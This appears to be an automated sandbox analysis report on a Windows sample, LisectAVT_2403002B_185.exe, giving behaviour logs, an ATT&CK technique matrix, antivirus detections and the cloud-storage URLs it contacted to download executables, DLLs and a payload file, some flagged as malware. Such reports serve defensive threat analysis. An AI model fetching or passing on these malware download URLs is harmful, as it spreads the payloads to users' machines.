Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EA407 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005EA407
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005E2E50 GetVersionExA,0_2_005E2E50
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
2
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory21
Security Software Discovery
Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
Obfuscated Files or Information
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSync34
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Timestomp
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
File Deletion
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
LisectAVT_2403002B_185.exe100%AviraTR/Scar.wfhdm
LisectAVT_2403002B_185.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://contoso.com/License0%URL Reputationsafe
http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/C0%Avira URL Cloudsafe
http://crl.micro0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/D0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/&0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1000%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exe0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/100%Avira URL Cloudmalware
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/w0%Avira URL Cloudsafe
http://ts-aia.ws.syma0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dllx0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binC:0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll20%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllU100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll0%Avira URL Cloudsafe
https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dll0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll-D0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dll0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijiQ-mw.0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlle0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beiji0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldll0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/Tiw100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/2000230%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldll0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dllO0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllnW9w0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sgp.file.myqcloud.com
43.153.232.152
truefalse
    unknown
    bj.file.myqcloud.com
    82.156.94.48
    truefalse
      unknown
      leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
      unknown
      unknowntrue
        unknown
        wwwqd-1323571269.cos.ap-singapore.myqcloud.com
        unknown
        unknowntrue
          unknown
          kdll-1323571269.cos.ap-beijing.myqcloud.com
          unknown
          unknowntrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exefalse
            • Avira URL Cloud: safe
            unknown
            https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binfalse
            • Avira URL Cloud: safe
            unknown
            https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllfalse
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllfalse
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/wLisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/100LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/DLisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/CLisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/LicenseLisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://ts-aia.ws.symaLisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/&LisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drfalse
              • URL Reputation: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binC:LisectAVT_2403002B_185.exefalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dllxLisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll2LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/LisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exeLisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloudLisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003941000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll-DLisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nuget.org/NuGet.exeLisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://aka.ms/winsvr-2022-pshelpLisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllULisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://pesterbdd.com/images/Pester.pngLisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlLisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijiQ-mw.LisectAVT_2403002B_185.exe, 00000000.00000003.2421071524.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldllLisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://go.microLisectAVT_2403002B_185.exe, 00000000.00000003.2522556870.0000000004115000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.thawte.com0LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drfalse
              • URL Reputation: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/IconLisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/LisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
